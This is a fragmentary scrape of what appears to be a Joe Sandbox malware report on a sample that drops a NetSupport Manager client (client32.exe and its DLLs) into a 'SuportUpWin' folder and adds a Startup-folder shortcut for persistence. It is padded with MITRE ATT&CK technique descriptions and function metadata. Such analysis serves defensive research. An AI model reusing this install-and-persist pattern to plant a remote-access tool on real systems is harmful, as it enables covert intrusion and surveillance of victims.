Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
String ID: ..\ctl32\wndclass.cpp$m_hWnd
API String ID: 1417657345-2201682149
Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681

Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D3B4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
m_hWnd, xrefs: 1101D3A3

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hkpqXovZtS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\loca[1].htm

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnk

C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll

C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL

C:\Users\user\AppData\Roaming\SuportUpWin\NSM.LIC

C:\Users\user\AppData\Roaming\SuportUpWin\NSM.ini

C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL

C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL

C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL

C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

C:\Users\user\AppData\Roaming\SuportUpWin\client32.ini

C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dll

Windows Analysis Report
hkpqXovZtS.exe

Function 02291C53 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 124
threadprocessCOMMON

Function 0040FBD4 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 174
COMMON

Function 022911EE Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 267
filenativeCOMMON

Function 0040F34C Relevance: 70.6, APIs: 28, Strings: 12, Instructions: 650
COMMON

Function 0040E51E Relevance: 61.7, APIs: 28, Strings: 7, Instructions: 418
windowfileCOMMON

Function 0040CFAA Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94
windowCOMMONLIBRARYCODE

Function 0040B8D9 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 241
COMMON

Function 0041CB5A Relevance: 16.6, APIs: 11, Instructions: 102
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre